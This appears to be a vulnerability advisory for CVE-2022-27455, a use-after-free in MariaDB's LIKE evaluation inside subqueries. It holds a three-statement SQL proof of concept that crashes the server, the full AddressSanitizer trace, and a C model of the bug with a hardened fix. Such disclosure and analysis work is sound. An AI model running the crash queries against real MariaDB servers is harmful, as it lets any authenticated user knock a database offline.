CVE-2022-27455: [MDEV-28097] use-after-free when WHERE has subquery with an outer reference in HAVING
MariaDB Server 10.6.3 and below was discovered to contain a use-after-free in the component my_wildcmp_8bit_impl at strings/ctype-simple.c. The AddressSanitizer report below shows the freed byte being read by Item_func_like::val_int() while the subquery in the WHERE clause is executed, on a BLOB heap that InnoDB had already released in row_mysql_prebuilt_free_blob_heap() when it fetched the next row of v0: a pointer into the storage engine's per-row memory outlives the fetch. The three statements that follow reproduce it on an ASan build; any authenticated user able to run SELECT against such a table can therefore crash the server.
CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 60 ) NOT NULL ) ;
INSERT INTO v0 ( ) VALUES ( v1 IN ( 127 , -1 = v1 OR -1 , 0 ) ) , ( 0 ) ;
SELECT DISTINCT * FROM v0 WHERE '' IN ( SELECT + 'x' LIKE v1 HAVING + v1 LIKE v1 ORDER BY v1 + v1 ) ;
==9327==ERROR: AddressSanitizer: heap-use-after-free on address 0x6290000c8288 at pc 0x000002b241e8 bp 0x7f3952747de0 sp 0x7f3952747dd8
READ of size 1 at 0x6290000c8288 thread T17
    #0 0x2b241e7 in my_wildcmp_8bit_impl /root/mariadb/strings/ctype-simple.c:964:12
    #1 0x2b2397a in my_wildcmp_8bit /root/mariadb/strings/ctype-simple.c:1050:10
    #2 0x16eea86 in charset_info_st::wildcmp(char const*, char const*, char const*, char const*, int, int, int) const /root/mariadb/include/m_ctype.h:910:12
    #3 0x16eea86 in Item_func_like::val_int() /root/mariadb/sql/item_cmpfunc.cc:5627:35
    #4 0x1315e0d in Type_handler_int_result::Item_val_bool(Item*) const /root/mariadb/sql/sql_type.cc:5105:16
    #5 0x16ec0f7 in Item_cond_and::val_int() /root/mariadb/sql/item_cmpfunc.cc:5421:16
    #6 0xdc6895 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4610:31
    #7 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
    #8 0x1952e43 in subselect_single_select_engine::exec() /root/mariadb/sql/item_subselect.cc:4115:11
    #9 0x1928ebb in Item_subselect::exec() /root/mariadb/sql/item_subselect.cc:853:21
    #10 0x1928ebb in Item_in_subselect::exec() /root/mariadb/sql/item_subselect.cc:1035:3
    #11 0x193469a in Item_in_subselect::val_bool() /root/mariadb/sql/item_subselect.cc:1965:7
    #12 0x16bcbca in Item_in_optimizer::val_int() /root/mariadb/sql/item_cmpfunc.cc:1637:17
    #13 0x1675138 in Item_cache_int::cache_value() /root/mariadb/sql/item.cc:10054:19
    #14 0x1666bec in Item_cache_wrapper::cache() /root/mariadb/sql/item.cc:8839:15
    #15 0x1666bec in Item_cache_wrapper::val_int() /root/mariadb/sql/item.cc:8893:3
    #16 0xe30e35 in evaluate_join_record(JOIN*, st_join_table*, int) /root/mariadb/sql/sql_select.cc:21193:25
    #17 0xd4c23d in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21134:9
    #18 0xdc6797 in do_select(JOIN*, Procedure*) /root/mariadb/sql/sql_select.cc:20640:14
    #19 0xdc6797 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4749:50
    #20 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
    #21 0xd4e4e8 in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /root/mariadb/sql/sql_select.cc:5007:9
    #22 0xd4d74b in handle_select(THD*, LEX*, select_result*, unsigned long) /root/mariadb/sql/sql_select.cc:543:10
    #23 0xc74410 in execute_sqlcom_select(THD*, TABLE_LIST*) /root/mariadb/sql/sql_parse.cc:6252:12
    #24 0xc609c9 in mysql_execute_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:3943:12
    #25 0xc4a67e in mysql_parse(THD*, char*, unsigned int, Parser_state*) /root/mariadb/sql/sql_parse.cc:8027:18
    #26 0xc41ba9 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /root/mariadb/sql/sql_parse.cc:1894:7
    #27 0xc4b74b in do_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:1402:17
    #28 0x111f9f2 in do_handle_one_connection(CONNECT*, bool) /root/mariadb/sql/sql_connect.cc:1418:11
    #29 0x111f248 in handle_one_connection /root/mariadb/sql/sql_connect.cc:1312:5
    #30 0x1f3f9dd in pfs_spawn_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
    #31 0x7f3978f38608 in start_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477:8
    #32 0x7f3978c4e162 in clone /build/glibc-sMfBJT/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
0x6290000c8288 is located 136 bytes inside of 16512-byte region [0x6290000c8200,0x6290000cc280)
freed by thread T17 here:
    #0 0x80f732 in free (/usr/local/mysql/bin/mariadbd+0x80f732)
    #1 0x243e1b8 in mem_heap_free(mem_block_info_t*) /root/mariadb/storage/innobase/include/mem0mem.inl:419:3
    #2 0x243e1b8 in row_mysql_prebuilt_free_blob_heap(row_prebuilt_t*) /root/mariadb/storage/innobase/row/row0mysql.cc:101:2
    #3 0x24b554c in row_sel_store_mysql_rec(unsigned char*, row_prebuilt_t*, unsigned char const*, dtuple_t const*, bool, dict_index_t const*, unsigned short const*) /root/mariadb/storage/innobase/row/row0sel.cc:3109:3
    #4 0x24afa37 in row_search_mvcc(unsigned char*, page_cur_mode_t, row_prebuilt_t*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
    #5 0x217429c in ha_innobase::general_fetch(unsigned char*, unsigned int, unsigned int) /root/mariadb/storage/innobase/handler/ha_innodb.cc:9236:24
    #6 0x15c44c3 in handler::ha_rnd_next(unsigned char*) /root/mariadb/sql/handler.cc:3393:5
    #7 0x930064 in rr_sequential(READ_RECORD*) /root/mariadb/sql/records.cc:519:35
    #8 0xd4c3e1 in READ_RECORD::read_record() /root/mariadb/sql/records.h:81:30
    #9 0xd4c3e1 in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21114:18
    #10 0xdc6797 in do_select(JOIN*, Procedure*) /root/mariadb/sql/sql_select.cc:20640:14
    #11 0xdc6797 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4749:50
    #12 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
    #13 0xd4e4e8 in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /root/mariadb/sql/sql_select.cc:5007:9
    #14 0xd4d74b in handle_select(THD*, LEX*, select_result*, unsigned long) /root/mariadb/sql/sql_select.cc:543:10
    #15 0xc74410 in execute_sqlcom_select(THD*, TABLE_LIST*) /root/mariadb/sql/sql_parse.cc:6252:12
    #16 0xc609c9 in mysql_execute_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:3943:12
    #17 0xc4a67e in mysql_parse(THD*, char*, unsigned int, Parser_state*) /root/mariadb/sql/sql_parse.cc:8027:18
    #18 0xc41ba9 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /root/mariadb/sql/sql_parse.cc:1894:7
    #19 0xc4b74b in do_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:1402:17
    #20 0x111f9f2 in do_handle_one_connection(CONNECT*, bool) /root/mariadb/sql/sql_connect.cc:1418:11
    #21 0x111f248 in handle_one_connection /root/mariadb/sql/sql_connect.cc:1312:5
    #22 0x1f3f9dd in pfs_spawn_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
    #23 0x7f3978f38608 in start_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477:8
previously allocated by thread T17 here:
    #0 0x80f99d in malloc (/usr/local/mysql/bin/mariadbd+0x80f99d)
    #1 0x215c51e in ut_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const*, unsigned int, bool, bool) /root/mariadb/storage/innobase/include/ut0new.h:375:11
    #2 0x2301754 in mem_heap_create_block_func(mem_block_info_t*, unsigned long, unsigned long) /root/mariadb/storage/innobase/mem/mem0mem.cc:277:37
    #3 0x24be2fc in mem_heap_create_func(unsigned long, unsigned long) /root/mariadb/storage/innobase/include/mem0mem.inl:377:10
    #4 0x24be2fc in row_sel_store_mysql_field(unsigned char*, row_prebuilt_t*, unsigned char const*, dict_index_t const*, unsigned short const*, unsigned long, mysql_row_templ_t const*) /root/mariadb/storage/innobase/row/row0sel.cc:3050:27
    #5 0x24b4ea9 in row_sel_store_mysql_rec(unsigned char*, row_prebuilt_t*, unsigned char const*, dtuple_t const*, bool, dict_index_t const*, unsigned short const*) /root/mariadb/storage/innobase/row/row0sel.cc:3196:8
    #6 0x24afa37 in row_search_mvcc(unsigned char*, page_cur_mode_t, row_prebuilt_t*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
    #7 0x21739c3 in ha_innobase::index_read(unsigned char*, unsigned char const*, unsigned int, ha_rkey_function) /root/mariadb/storage/innobase/handler/ha_innodb.cc:8970:5
    #8 0x2174d99 in ha_innobase::index_first(unsigned char*) /root/mariadb/storage/innobase/handler/ha_innodb.cc:9339:14
    #9 0x2174d99 in ha_innobase::rnd_next(unsigned char*) /root/mariadb/storage/innobase/handler/ha_innodb.cc:9432:11
    #10 0x15c44c3 in handler::ha_rnd_next(unsigned char*) /root/mariadb/sql/handler.cc:3393:5
    #11 0x930064 in rr_sequential(READ_RECORD*) /root/mariadb/sql/records.cc:519:35
    #12 0xd4c04d in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21092:12
    #13 0xdc6797 in do_select(JOIN*, Procedure*) /root/mariadb/sql/sql_select.cc:20640:14
    #14 0xdc6797 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4749:50
    #15 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
    #16 0xd4e4e8 in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /root/mariadb/sql/sql_select.cc:5007:9
    #17 0xd4d74b in handle_select(THD*, LEX*, select_result*, unsigned long) /root/mariadb/sql/sql_select.cc:543:10
    #18 0xc74410 in execute_sqlcom_select(THD*, TABLE_LIST*) /root/mariadb/sql/sql_parse.cc:6252:12
    #19 0xc609c9 in mysql_execute_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:3943:12
    #20 0xc4a67e in mysql_parse(THD*, char*, unsigned int, Parser_state*) /root/mariadb/sql/sql_parse.cc:8027:18
    #21 0xc41ba9 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /root/mariadb/sql/sql_parse.cc:1894:7
    #22 0xc4b74b in do_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:1402:17
    #23 0x111f9f2 in do_handle_one_connection(CONNECT*, bool) /root/mariadb/sql/sql_connect.cc:1418:11
    #24 0x111f248 in handle_one_connection /root/mariadb/sql/sql_connect.cc:1312:5
    #25 0x1f3f9dd in pfs_spawn_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
    #26 0x7f3978f38608 in start_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477:8
Thread T17 created by T0 here:
    #0 0x7f9cfc in pthread_create (/usr/local/mysql/bin/mariadbd+0x7f9cfc)
    #1 0x1f3fd39 in my_thread_create(unsigned long*, pthread_attr_t const*, void* (*)(void*), void*) /root/mariadb/storage/perfschema/my_thread.h:52:10
    #2 0x1f3fd39 in pfs_spawn_thread_v1 /root/mariadb/storage/perfschema/pfs.cc:2252:15
    #3 0x85cef4 in inline_mysql_thread_create(unsigned int, unsigned long*, pthread_attr_t const*, void* (*)(void*), void*) /root/mariadb/include/mysql/psi/mysql_thread.h:1139:11
    #4 0x85cef4 in create_thread_to_handle_connection(CONNECT*) /root/mariadb/sql/mysqld.cc:5975:19
    #5 0x85e72a in create_new_thread(CONNECT*) /root/mariadb/sql/mysqld.cc:6034:3
    #6 0x85e72a in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /root/mariadb/sql/mysqld.cc:6096:5
    #7 0x85a34c in handle_connections_sockets() /root/mariadb/sql/mysqld.cc:6220:9
    #8 0x84e9ef in mysqld_main(int, char**) /root/mariadb/sql/mysqld.cc:5870:3
    #9 0x7f3978b530b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /root/mariadb/strings/ctype-simple.c:964:12 in my_wildcmp_8bit_impl
Shadow bytes around the buggy address:
0x0c5280011000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280011040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c5280011050: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280011090: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c52800110a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==9327==ABORTING
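The three stacks above record a fixed order of events: the first row of v0 is fetched under rnd_next and its BLOB heap allocated, the heap is freed under ha_rnd_next when the next row is fetched, and the freed bytes are then read by my_wildcmp_8bit while the subquery runs. That is the general pattern of a pointer borrowed from a storage engine's per-row memory outliving the fetch. The C program below is an added model of that pattern, written for this page and not MariaDB source: prebuilt, fetch_row, blob_heap_free, wild_match and outer_ref are stand-ins for row_prebuilt_t, row_sel_store_mysql_rec, row_mysql_prebuilt_free_blob_heap, my_wildcmp_8bit and the cached outer reference to v1; the row values and the LIKE pattern are constructed. Freed memory is modelled as a slot overwritten with a poison byte so the stale read is deterministic rather than undefined. The hardened variant copies the value into executor-owned storage before the engine can free it; the page does not say whether that is how upstream fixed MDEV-28097, so treat it as the model's own remedy.

```c
/* Model of the bug class behind MDEV-28097 / CVE-2022-27455.  Added
 * example, not MariaDB source; every name below is a stand-in. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NROWS          2
#define BLOB_HEAP_SIZE 32
#define HEAP_SLOTS     2
#define FREED_FILL     0xDD   /* debug-allocator style poison for freed heap */

/* Constructed contents of v0 (TEXT column v1); not the PoC's values. */
static const char *table_v0[NROWS] = { "abc", "0" };

/* Engine side (stand-in for row_prebuilt_t): one live BLOB heap at a time.
 * Slots stand in for separate malloc'd heaps; freeing poisons the slot. */
struct prebuilt {
    char slots[HEAP_SLOTS][BLOB_HEAP_SIZE];
    int  live;                        /* index of the live slot, -1 if none */
};

static void blob_heap_free(struct prebuilt *pb)   /* ~ row_mysql_prebuilt_free_blob_heap */
{
    if (pb->live >= 0)
        memset(pb->slots[pb->live], FREED_FILL, BLOB_HEAP_SIZE);
    pb->live = -1;
}

/* Store row n into a fresh heap and hand the executor a pointer INTO it.
 * Any pointer the executor kept from the previous row is now dangling. */
static const char *fetch_row(struct prebuilt *pb, int n, size_t *len)   /* ~ row_sel_store_mysql_rec */
{
    blob_heap_free(pb);                       /* free the previous row's heap */
    pb->live = n % HEAP_SLOTS;                /* ~ mem_heap_create for this row */
    *len = strlen(table_v0[n]);
    memcpy(pb->slots[pb->live], table_v0[n], *len);
    return pb->slots[pb->live];
}

/* Minimal '%' / '_' matcher over [s,se) and [w,we): the pointer-pair shape
 * of my_wildcmp_8bit, so a stale (s,se) pair is read exactly as LIKE would. */
static int wild_match(const char *s, const char *se, const char *w, const char *we)
{
    while (w < we) {
        if (*w == '%') {
            for (++w; ; ++s) {
                if (wild_match(s, se, w, we)) return 1;
                if (s == se) return 0;
            }
        }
        if (s == se) return 0;
        if (*w != '_' && *w != *s) return 0;
        ++w; ++s;
    }
    return s == se;
}

/* Executor side: the outer reference to v1 that the subquery's HAVING reads. */
struct outer_ref {
    const char *ptr;                   /* vulnerable: borrowed engine pointer */
    size_t      len;
    char        own[BLOB_HEAP_SIZE];   /* hardened: executor-owned copy */
};

static void capture_outer_ref(struct outer_ref *r, const char *v1, size_t len, int hardened)
{
    r->len = len;
    if (hardened) {                    /* copy before the engine can free it */
        memcpy(r->own, v1, len);
        r->ptr = r->own;
    } else {
        r->ptr = v1;                   /* keeps pointing into the BLOB heap */
    }
}

static int having_like(const struct outer_ref *r, const char *pattern)   /* ~ Item_func_like::val_int */
{
    return wild_match(r->ptr, r->ptr + r->len, pattern, pattern + strlen(pattern));
}

/* Drive the scan in the order the ASan stacks show: row 0's v1 is captured,
 * the engine is asked for row 1 (freeing row 0's heap), and only then is
 * HAVING evaluated through the captured reference.  Returns 1 if that
 * evaluation saw row 0's real value "abc" (pattern a_c matches), 0 if it
 * saw the poisoned heap instead. */
static int scan_having_result(int hardened)
{
    struct prebuilt pb = { .live = -1 };
    struct outer_ref ref;
    size_t len;

    const char *v1 = fetch_row(&pb, 0, &len);    /* rnd_next: first row */
    capture_outer_ref(&ref, v1, len, hardened);  /* subquery binds outer v1 */
    fetch_row(&pb, 1, &len);                     /* ha_rnd_next: frees row 0's heap */
    return having_like(&ref, "a_c");             /* LIKE over the stale pair */
}

int main(void)
{
    printf("borrowed pointer: HAVING -> %d (expected 1)\n", scan_having_result(0));
    printf("owned copy      : HAVING -> %d (expected 1)\n", scan_having_result(1));
    return 0;
}
```

Build with `cc -std=c99 -Wall uaf_model.c` (file name assumed). The borrowed-pointer run evaluates the HAVING over poison and returns 0 where 1 is correct; the owned-copy run returns 1. If the slot model is replaced with real malloc/free for the heaps, the same program built with `-fsanitize=address` produces a heap-use-after-free report whose "freed by" and "previously allocated by" stacks pair up the way the report on this page does.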